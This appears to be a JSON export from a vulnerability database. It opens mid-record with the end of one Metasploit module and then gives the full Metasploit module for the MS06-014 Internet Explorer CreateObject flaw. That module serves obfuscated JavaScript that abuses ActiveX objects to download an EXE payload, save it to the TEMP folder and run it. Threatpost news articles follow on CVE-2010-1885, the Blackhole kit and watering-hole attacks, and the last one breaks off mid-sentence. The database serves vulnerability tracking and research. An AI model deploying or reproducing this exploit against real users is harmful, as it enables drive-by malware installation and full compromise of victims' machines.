xmlns:D=\"DAV:\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag>\n<lp2:executable>F</lp2:executable>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n\n elsif (path =~ /\\/$/) or (not path.sub('/', '').index('/'))\n # Response for anything else (generally just /)\n print_status(\"Sending directory multistatus for #{path} ...\")\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag>\n<D:lockdiscovery/>\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n\n else\n print_status(\"Sending 404 for #{path} ...\")\n send_not_found(cli)\n return\n\n end\n\n # send the response\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml'\n cli.send_response(resp)\n end\n\n\n #\n # Make sure we're on the right port/path to support WebDAV\n #\n def exploit\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\n end\n\n super\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/java_ws_arginject_altjvm.rb"}, {"lastseen": "2020-05-23T03:50:22", "description": "This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects.\n", "published": "2009-07-22T20:14:35", "type": "metasploit", "title": "MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003", "CVE-2006-4704"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CREATEOBJECT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::Seh\n include Msf::Exploit::EXE\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n # In badly misconfigured situations, IE7 and 8 could be vulnerable to\n # this, but by default they throw an ugly popup that stops all script\n # execution until the user deals with it and aborts everything if they\n # click \"no\". Not worth the risk of being unable to try more recent\n # exploits. Make sure service packs on top of 6.0 are considered less\n # than the max by setting to 6.1 (which doesn't really exist).\n :ua_maxver => \"6.1\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :method => [ 'CreateObject', 'GetObject' ],\n :classid =>\n [\n '{BD96C556-65A3-11D0-983A-00C04FC29E36}',\n '{BD96C556-65A3-11D0-983A-00C04FC29E30}',\n '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',\n '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',\n '{6414512B-B978-451D-A0D8-FCFDF33E833C}',\n '{06723E09-F4C2-43c8-8358-09FCD1DB0766}',\n '{639F725F-1B2D-4831-A9FD-874847682010}',\n '{BA018599-1DB3-44f9-83B4-461454C84BF8}',\n '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',\n '{E8CCCDDF-CA28-496b-B050-6C07C962476B}',\n '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',\n '{0006F033-0000-0000-C000-000000000046}',\n '{0006F03A-0000-0000-C000-000000000046}',\n ],\n #:rank => ExcellentRanking # reliable exe writer\n })\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution',\n 'Description' => %q{\n This module exploits a generic code execution vulnerability in Internet\n Explorer by abusing vulnerable ActiveX objects.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'hdm',\n ],\n 'References' =>\n [\n # MDAC\n [ 'MSB', 'MS06-014' ],\n [ 'CVE', '2006-0003' ],\n [ 'OSVDB', '24517' ],\n # WMI Object Broker\n [ 'MSB', 'MS06-073' ],\n [ 'CVE', '2006-4704' ],\n [ 'OSVDB', '30155' ],\n ],\n 'Payload' =>\n {\n 'Space' => 2048,\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n\n # Patched\n [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],\n # Found in mpack\n [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],\n\n # Patched\n [ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],\n\n # These are restricted by site (might be exploitable via DNS spoofing + SSL fun)\n [ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],\n [ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],\n\n # Visual Studio components, not marked as safe\n [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],\n [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],\n [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],\n [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],\n [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],\n\n #\n # The controls below can launch the \"installing component\" dialogs...\n #\n\n # Not marked as safe\n [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],\n\n # Not marked as safe\n [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],\n\n # Found exploitable in the wild (no details)\n [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],\n\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 11 2006'))\n end\n\n def on_request_uri(cli, request)\n\n if (request.uri.match(/payload/))\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_exe({ :code => p.encoded })\n print_status(\"Sending EXE payload\")\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n # Build out the HTML response page\n var_html = rand_text_alpha(rand(30)+2)\n var_func_exploit = rand_text_alpha(rand(30)+2);\n var_func_go = rand_text_alpha(rand(30)+2);\n var_func_createo = rand_text_alpha(rand(30)+2);\n var_exe_name = rand_text_alpha(rand(30)+2);\n var_objects = ''\n\n # Build the object list based on target selection\n if (target.name == 'Automatic')\n targets.each do |t|\n next if not t['CLSID']\n var_objects += t['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\n end\n else\n var_objects += target['CLSID'].unpack('C*').map{|c| \" '#{c.chr}' \"}.join(\"+\") + \",\"\n end\n\n\n content = %Q^\n<html><head><title></title>\n<script language=\"javascript\">\n\nfunction #{var_func_createo}( o , n ) {\n var r = null;\n\n try { eval(\"r=o\" + \".C\" + \"re\" + \"ate\" + \"Ob\" + \"je\" + \"ct(n)\" ) }catch(e){}\n\n if (! r) {\n try { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'')\" ) }catch(e){}\n }\n\n if (! r) {\n try { eval(\"r=o\" + \".Cr\" + \"ea\" + \"teO\" + \"bj\" + \"ect(n,'','')\" ) }catch(e){}\n }\n\n if (! r) {\n try { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"je\" + \"ct('',n)\" ) }catch(e){}\n }\n\n if (! r) {\n try { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n,'')\" ) }catch(e){}\n }\n\n if (! r) {\n try { eval(\"r=o\" + \".Ge\" + \"tOb\" + \"ject(n)\" ) }catch(e){}\n }\n\n return( r );\n}\n\nfunction #{var_func_go}( a ) {\n\n var s = #{var_func_createo}( a, \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" );\n\n var o = #{var_func_createo}( a, \"A\" + \"DO\" + \"D\" + \"B.S\" + \"tr\" + \"eam\" );\n\n var e = s.Environment( \"P\" + \"ro\" + \"ce\" + \"ss\" );\n\n\n var url = document.location + '/p' + 'ay' + 'lo' + 'ad';\n var xml = null;\n var bin = e.Item( \"T\" + \"E\" + \"M\" + \"P\" ) + \"\\\\\\\\#{var_exe_name}\" + \".e\" + \"xe\";\n var dat;\n\n try { xml=new XMLHttpRequest(); }\n catch(e) {\n try { xml = new ActiveXObject(\"Microsoft.XMLHTTP\"); }\n catch(e) {\n xml = new ActiveXObject(\"MSXML2.ServerXMLHTTP\");\n }\n }\n\n if (! xml) {\n return(0);\n }\n\n xml.open(\"GET\", url, false);\n xml.send(null);\n dat = xml.responseBody;\n\n o.Type = 1 ;\n o.Mode = 3 ;\n o.Open ( ) ;\n o.Write ( dat ) ;\n o.SaveToFile ( bin, 2) ;\n\n s.Run ( bin , 0 );\n}\n\nfunction #{var_func_exploit}( ) {\n var i = 0;\n var t = new Array( #{var_objects} null );\n\n while (t[i]) {\n var a = null;\n\n if (t[i].substring(0,1) == '{') {\n a = document.createElement(\"object\");\n a.setAttribute(\"cl\" + \"as\" + \"sid\", \"cl\" + \"s\" + \"id\" +\":\" + t[i].substring( 1, t[i].length - 1 ) ) ;\n } else {\n try { a = new ActiveXObject(t[i]); } catch(e){}\n }\n\n if (a) {\n try {\n var b = #{var_func_createo}( a , \"W\" + \"Sc\" + \"ri\" + \"pt\" + \".S\" + \"he\" + \"ll\" ) ;\n if (b) {\n #{var_func_go}( a ) ;\n return(0) ;\n }\n } catch(e){\n }\n }\n i++;\n }\n}\n</script>\n</head>\n<body onload='#{var_func_exploit}()'>\n#{var_html}\n</body>\n</html>\n\n^\n\n\n content = Rex::Text.randomize_space(content)\n\n print_status(\"Sending exploit HTML...\")\n\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_createobject.rb"}], "threatpost": [{"lastseen": "2018-10-06T23:00:02", "bulletinFamily": "info", "cvelist": ["CVE-2010-1885"], "description": "**BERLIN**\u2013Just whispering the words \u201cvulnerability disclosure\u201d within earshot of a security researcher or vendor security response team members can put you in fear for your life these days. The debate is so old and worn out that there is virtually nothing new left to say or chew on at this point. However, the question of when to disclose that a given vulnerability is being exploited in the wild is an entirely different one.\n\nRegardless of which sect or splinter cell you belong to in the [disclosure debate](<https://threatpost.com/exploit-sales-the-new-disclosure-debate/100641>), for most people it all comes down to finding the most effective way to get a fix published and in the hands of users as quickly as possible. That could mean coordinated disclosure with the vendor or full disclosure on a public mailing list or something in between. But the lines get a little blurry when the discussion veers into the appropriate moment to tell the public that a given vulnerability is being actively exploited. It may seem obvious that users should be told as soon as possible, giving them the best chance at defending themselves or their networks. But there are many other factors in play, mainly the fact that alerting users also will wake up the attacker community.\n\nThat\u2019s no small consideration, especially when it concerns a vulnerability in a widely deployed application such as Internet Explorer, Adobe Flash or Java. Researchers from Microsoft and Lancope looked at public exploitation notifications in a handful of major cases from the last few years and found that, as with many things in life, timing is everything.\n\n\u201cExploitation disclosure is a good thing at any time, but the question is when and can it cause problems?\u201d said Tom Cross of Lancope, who, along with Holly Stewart of Microsoft, gave a talk on the topic at the Virus Bulletin 2013 conference here Wednesday.\n\nOne of the cases the pair examined was the Windows Help and Support Center CVE-2010-1885 vulnerability. That bug was disclosed publicly on the Full Disclosure mailing list in June 2010 and the original disclosure included a proof-of-concept exploit. Not long afterward, the exploit was integrated into some attack toolkits and attacks against the vulnerability spiked. In other cases, researchers have gone through the coordinated disclosure process, working with vendors to get a fix ready before announcing the bug, and once the announcement is made, exploitation attempts will immediately increase as attackers pull apart the patch to find the bug behind it.\n\nNot unlike the dreaded disclosure debate, the decision on when to notify users of exploitation attempts depends upon a number of factors. If a vulnerability is particularly severe and there are ongoing, widespread attacks against, the vendor may well choose to notify users even if there\u2019s no patch available. On the other hand, if the attacks are targeted and relatively spotty and the vendor has no workaround ready, it may decide to hold off on notification.\n\n\u201cIf there\u2019s nothing you can tell the users to do, there\u2019s not a lot of point in disclosing the exploits,\u201d he said. \u201cIt depends on the level of exploitation, the geographic distribution, is a patch available, when will it be if it\u2019s not. If the answer is to tell people not to use a piece of software that\u2019s necessary to do business, the reality is that\u2019s not going to happen.\u201d\n\nIt\u2019s also true that the decision is not always solely in the hands of the vendor or even the researcher who discovered the vulnerability. In some cases, a third party security company may notice exploit attempts against a previously unknown vulnerability and take the step of notifying customers.\n\n\u201cThere is no one answer,\u201d Cross said.\n", "modified": "2013-10-02T17:38:20", "published": "2013-10-02T10:04:52", "id": "THREATPOST:243FAEE6E3B441A3C58FD1A9BF0E6A2D", "href": "https://threatpost.com/researchers-ponder-when-to-notify-users-of-public-vulnerability-exploits/102487/", "type": "threatpost", "title": "Researchers Ponder When to Notify Users of Public Vulnerability Exploits", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:30", "bulletinFamily": "info", "cvelist": ["CVE-2010-1885"], "description": "[](<https://threatpost.com/huge-increase-seen-attacks-windows-help-center-flaw-070110/>)Attackers are ramping up their attempts to exploit the recently disclosed [vulnerability in the Windows Help and Support Center in Windows XP](<https://threatpost.com/googler-drops-windows-zero-day-microsoft-unhappy-061010/>). There have been targeted attacks against the flaw for two weeks now, but experts have noticed a major increase in the volume and spread of them in recent days.\n\nMicrosoft\u2019s security group has been looking at data coming back from machines running the company\u2019s anti-malware software, as well as from other data sources, and found that [attacks against the Windows Help and Support Center flaw](<http://blogs.technet.com/b/mmpc/archive/2010/06/30/attacks-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx>) have been increasing dramatically over the last few days. Since the first targeted attacks against the vulnerability began in mid-June, the volume and diversity of exploitation attempts has been on the rise, Microsoft said.\n\nAccording to Microsoft\u2019s data on the attack, more than 10,000 unique machines have seen this attack at least once. And that data obviously isn\u2019t comprehensive, as it typically just includes data sent back from PCs running Microsoft\u2019s security software. But the company added that the attacks also have been widely distributed around world, with the U.S., Russia, Germany and a few other countries seeing the most attacks so far. \n\n\n\nThe company said that most of the original attacks included one payload, a piece of malware called Obitel that serves as a downloader for subsequent malware installations. But the current wave of attacks has a number of different payloads, including a couple of Trojan downloaders that end up on victim machines after several script redirections. \n\nMicrosoft has released a [FixIt tool for the Windows Help and Support Center flaw](<http://support.microsoft.com/kb/2219475>), a weakness that also affects Windows Server 2003. The company has not yet released a patch for the vulnerability, which was disclosed in early June.\n", "modified": "2018-08-15T12:28:25", "published": "2010-07-01T11:15:39", "id": "THREATPOST:A0E12A73898C41CD87CEBAD62A9C9D5A", "href": "https://threatpost.com/huge-increase-seen-attacks-windows-help-center-flaw-070110/74168/", "type": "threatpost", "title": "Huge Increase Seen in Attacks on Windows Help Center Flaw", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:25", "bulletinFamily": "info", "cvelist": ["CVE-2010-1885"], "description": "[](<https://threatpost.com/microsoft-25000-computers-attacked-latest-windows-zero-day-071410/>)The Windows Help and Support Center vulnerability that was patched with yesterday\u2019s [MS10-042 bulletin](<https://threatpost.com/ms-patch-tuesday-googler-zero-day-fixed-33-days-071310/>) was under active attack by malware miscreants, especially in Europe where Microsoft tracked about 25,000 attempts to exploit the vulnerability.\n\nAccording to Microsoft\u2019s Holly Stewart, the attacks escalated significantly when the company announced the issue would be fixed in this month\u2019s Patch Tuesday.\n\nIn a blog post to the Microsoft Malware Protection Center (MMPC) [blog](<http://blogs.technet.com/b/mmpc/archive/2010/07/13/update-on-the-windows-help-and-support-center-vulnerability-cve-2010-1885.aspx>), Stewart said the attacks started a few weeks ago and have continued to expand and some new attack patterns have come into play. \n\n#### [ [MS Patch Tuesday: Googler Zero-Day Fixed in 33 Days](<https://threatpost.com/ms-patch-tuesday-googler-zero-day-fixed-33-days-071310/>) ]\n\n_The attacks that we have witnessed in the wild work only on Windows XP (not Windows 2003). Early on, we saw attackers incorporate code to single out Windows XP targets, but more recently the attackers have been less discriminant, attempting this attack on a variety of operating systems, about half of which were not susceptible because the exploit code could have only been successful on a vulnerable version of Windows XP. _\n\nAs of midnight on July 12 (GMT), over 25,000 distinct computers in over 100 countries/regions have reported this attack attempt at least one time, Stewart said. There was a \u201cfairly large increase\u201d over this past weekend, shortly after Microsoft announced that an update would be provided to fix this issue with the July security bulletin release.\n\n#### [ SEE: [Googler Drops Windows Zero-Day, Microsoft Unhappy](<https://threatpost.com/googler-drops-windows-zero-day-microsoft-unhappy-061010/>) ]\n\nWhere were the attacks spotted?\n\n_Although Portugal has remained one of the most targeted areas, attacks on Russian systems have surpassed it over the past few weeks. Russia has now seen more than ten times the number of attack attempts per computer in comparison to the global average. Other countries/regions that have seen more than the global average are predominantly in Europe and the UK. The UK, in particular, was one of the regions in which we witnessed a surge in attack attempts over this past weekend._\n\nStewart said Microsoft tracked attack attempts in over 100 countries/regions.\n", "modified": "2018-08-15T12:25:04", "published": "2010-07-14T16:25:37", "id": "THREATPOST:53F6ADA586C083C4B07DDECFA9D7DBEC", "href": "https://threatpost.com/microsoft-25000-computers-attacked-latest-windows-zero-day-071410/74208/", "type": "threatpost", "title": "Microsoft: 25,000 Computers Attacked With Latest Windows Zero Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:16", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927"], "description": "[](<https://threatpost.com/new-pdf-attack-targets-aviation-defense-industry-091312/>)FireEye reported today it had detected a new critical PDF attack targeting the aviation defense industry. Malware Page exploits a [stack-based buffer overflow vulnerability in Adobe Acrobat and Adobe Reader](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>). An attacker would be able to execute code remotely via a crafted argument to the getIcon method of a Collab object, according to the CVE alert.\n\nWhen a user opens the infected PDF, the exploit creates an executable file, which drops a DLL and opens a backdoor connection on TCP port 49163, FireEye said in its analysis. The malware opens connections to IP addresses in Germany and the Bahamas and maintains a detailed log of all network communications. \nSimultaneously, the attack drops a decoy PDF document which is an invitation to an actual defense industry event.\n", "modified": "2013-04-17T16:31:34", "published": "2012-09-13T19:46:42", "id": "THREATPOST:1B37290C48B43298A5C4751356F68B70", "href": "https://threatpost.com/new-pdf-attack-targets-aviation-defense-industry-091312/77011/", "type": "threatpost", "title": "New PDF Attack Targets Aviation Defense Industry", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:29", "bulletinFamily": "info", "cvelist": ["CVE-2010-0188", "CVE-2010-1885"], "description": "There are a number of compromised sites on the popular blogging platform, WordPress, which, according to [a Trend Labs report](<http://blog.trendmicro.com/compromised-wordpress-sites-drive-users-to-blackhole-exploit-kit>), are actively infecting users with the[ CRIDEX worm](<https://threatpost.com/video-new-banking-trojan-caught-breaking-captcha-013012/>).\n\nThe infections are part of a [social engineering](<https://threatpost.com/mass-wordpress-compromise-fuels-cridex-worm-outbreak-032212/>) campaign that lures users with emails purporting to come from trusted sources like [LinkedIn](<http://www.linkedin.com/>) and [the Better Business Bureau](<http://www.bbb.org/>), Trend Labs warned.\n\nE-mails purporting to come from the Better Business Bureau informs its recipients of a (non-existent) complaint lodged against his or her business. The email includes a link to the \u201cComplaint Report,\u201d which leads to one of the infected WordPress sites.\n\nPhony LinkedIn emails pose as invitation notifications and pending messages. They include a number of links, all of which lead to compromised WordPress sites.\n\nAccording to Trend researchers, users who click the links are subject to Web based attacks that [target a vulnerability in Adobe\u2019s Reader and Acrobat](<https://threatpost.com/waves-attacks-target-adobe-reader-bug-2010-022212/>) software ([CVE-2010-0188](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188>)) and a common Windows Help Center vulnerability ([CVE-2010-1885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>)). After exploiting the vulnerabilities, attackers push copies of the Blackhole exploit kit to infect users with the CRIDEX worm.\n\nTrend Labs reports that WORM_CRIDEX.IC is generating a number of random domains using domain generating algorithms (DGA). The technique is commonly used to evade law enforcement and botnet take-downs. The behavior of the sample is dependent upon the specific configuration file, which, in Trend Labs case, was unavailable to them. However, based on their static analysis, the malware is capable of executing and deleting files and retrieving certificates from a certificate store.\n\nThis isn\u2019t the first time that [WordPress](<http://wordpress.org/>) sites have been used to push the Blackhole Exploit kit. In November of last year, similar reports surfaced in which [WordPress users were being re-directed](<https://threatpost.com/compromised-wordpress-sites-redirecting-black-hole-exploit-kit-servers-110211/>) to servers hosting the Blackhole kit.\n", "modified": "2013-04-17T20:05:35", "published": "2012-03-22T15:44:13", "id": "THREATPOST:0A9F9D2C917F57EAE16B15B6166B45F6", "href": "https://threatpost.com/mass-wordpress-compromise-fuels-cridex-worm-outbreak-032212/76357/", "type": "threatpost", "title": "Mass WordPress Compromise Fuels CRIDEX Worm Outbreak", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:52", "bulletinFamily": "info", "cvelist": ["CVE-2010-0188", "CVE-2010-1885"], "description": "**UPDATE:** A big wave of emails purporting to be Craigslist notifications but containing links to websites hosting the [Black Hole exploit kit](<https://threatpost.com/black-hole-exploit-kit-available-free-052311/>) hit the Internet yesterday, a day that already was filled with drama surrounding the LinkedIn password dump.\n\nThe malicious emails, 150,000 of which were caught by [Websense](<http://community.websense.com/blogs/securitylabs/archive/2012/06/06/malicious-urls-in-fake-craigslist-emails.aspx>) Security Lab\u2019s Cloud Email Security portal yesterday, attempt to convince recipients that \u201cFURTHER ACTION IS REQUIRED TO COMPLETE [THEIR] REQUEST!!!\u201d The emails go on to claim that recipients must follow the (malicious) link below in order to publish, edit or delete their ad or verify their email address. At the bottom of the email is a bold and capped piece of text that helpfully advises that users \u201cKEEP THIS EMAIL.\u201d\n\nIt is not clear if these emails are just blanketing random email addresses or exclusively targeting individuals who are currently running ads on Craigslist. Websense officials didn\u2019t respond to a request for clarification on that point.\n\nIn an email recieved after publication Thursday afternoon, a Websense spokespoerson told Threatpost that the emails did not appear to be targeted specifically toward individuals running ads on Craigslist, but rather that they seemed to be part of a broad a spam campaign. \n\n\nWebsense lists \u201cModels for fine\u201d (systems / network), \u201cStudio4PaintWorkCatskills\u201d (education), and \u201cShow Your Art\u201d (cars+trucks) as a few of the email subjects popping up in the scam. Websense also reports that the malicious emails have seemingly legitimate sender addresses and are convincingly similar in appearance to real automated Craigslist notifications.\n\nThe malicious links in the emails are leading users to a compromised WordPress page containing obfuscated Java Script in the form of an iframe. According to Websense, the attackers are exploiting [CVE-2010-0188](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188>) and [CVE-2010-1885](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>).\n", "modified": "2013-04-17T20:03:31", "published": "2012-06-07T16:27:03", "id": "THREATPOST:A53F2293D6BF2EC7D120A2CC2B3D2524", "href": "https://threatpost.com/fake-automated-craigslist-email-notifications-link-blackhole-exploit-kit-060712/76661/", "type": "threatpost", "title": "Fake Automated Craigslist Email Notifications Link to Blackhole Exploit Kit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:40", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "description": "**Update:** _Aaron Harison, president of the Center for American Freedom, told Threatpost this morning that the issue has been resolved and the site is no longer serving malware. _** **\n\nHackers have latched on to the NSA surveillance story\u2014literally.\n\nA news story on the outing of whistleblower Edward Snowden posted to the Washington Free Beacon is serving malware redirecting visitors to a malicious site where more malware awaits. The Free Beacon site remains infected, according to Invincea researchers, who said they have contacted the news organization about the attack. The story is being linked to by the popular Drudge Report and it\u2019s likely to have snared a pretty good number of victims so far.\n\nThe attack on the Free Beacon is similar to a previous [watering hole attack carried out against a number of other Washington, D.C.-based media outlets](<http://threatpost.com/d-c-media-sites-hacked-serving-fake-av/>), including radio station WTOP, Federal News Radio and the site of technology blogger John Dvorak. Invincea researcher Eddie Mitchell wrote on the company\u2019s blog that several other Free Beacon pages are also serving javascript, including the site\u2019s main index page. The javascript drops an iframe that sends traffic offsite to a page hosting the Fiesta Exploit Kit.\n\n\u201cThis exploit appears to be the same as used against other media sites to infect readers of these websites and part of a concerted campaign against media sites to infect their visitors by exploiting vulnerabilities in Java,\u201d Mitchell wrote. \u201c\n\nMitchell cautions that this attack isn\u2019t being detected yet by security companies because signatures associated with the attack are different from previous campaigns.\n\nThe Free Beacon attack is infecting users with the [ZeroAccess rootkit](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/>), as well as scareware. ZeroAccess is a virulent [peer-to-peer botnet](<http://threatpost.com/number-of-peer-to-peer-botnets-grows-5x/>) that has been folded into a number of commercial exploit kits including Blackhole. The malware makes an outbound communication requests to a number of command and control servers including e-zeeinternet[.]com, cinnamyn[.]com and twinkcam[.]net, from where the additional malware is loaded onto victim machines.\n\nA little more than a month ago, the campaigns against WTOP and sister station Federal News Radio were discovered. The exploits targeted Java and Adobe plug-ins and were used to spread scareware. Content on both stations is heavily political and the attacks could have been a jumping off point for a larger attack against federal employees who use the site as a resource. Unlike other watering hole attacks that lead to espionage campaigns against activists or political leaders, this one was serving malware usually associated with the cybercrime.\n\nThe Dvorak site was also attacked a month ago and malware was discovered on the site\u2019s [WordPress configuration files](<http://threatpost.com/hackers-using-brute-force-attacks-harvest-wordpress-sites-041513/>). Invincea said at the time that it used Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. The browser was pulling a Java app from the attacker\u2019s site and connecting to one of two Russian domains downloading Amsecure malware, which is part of the Kazy malware family, which is known for ransomware and scareware attacks. Three Java and Reader exploits were discovered on the Dvorak site: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. These exploits lead to landing page hosting the Black Hole exploit kit and the Amsecure attacks.\n", "modified": "2013-06-12T16:59:18", "published": "2013-06-10T16:17:14", "id": "THREATPOST:988117842525F1F414002817E6166A11", "href": "https://threatpost.com/nsa-whistleblower-article-redirects-to-malware/100930/", "type": "threatpost", "title": "Free Beacon Article Redirects to ZeroAccess Rootkit, Fake AV", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:49", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "description": "Websites belonging to a number of Washington, D.C.-area media outlets have been compromised in a series of opportunistic attacks with criminals using a watering-hole tactic to spread scareware, or phony antivirus software.\n\nPopular D.C. radio station WTOP, sister station Federal News Radio, and the site of technology blogger John Dvorak, were infected with exploits targeting third-party Java or Adobe browser plug-ins. The exploits redirect site visitors to an exploit kit serving a scareware executable known as Amsecure.\n\nAs of Tuesday morning, WTOP was still serving malware. The source of the attacks on WTOP and Federal News Radio has not been determined, and it still could be that these are a jumping off point for a larger attack against Federal employees who frequent those sites as a D.C. news source. Media sites have been targeted with more frequency in recent months, and on a variety of levels. But for now, experts are not calling these targeted attacks.\n\n\u201cTypically with \u2018watering hole\u2019 style attacks, the threat actors are targeting a very specific group of users or organizations in order to implant malware (remote access Trojan) that allows for access to the victim\u2019s network (as we saw with the recent DoL compromise),\u201d said 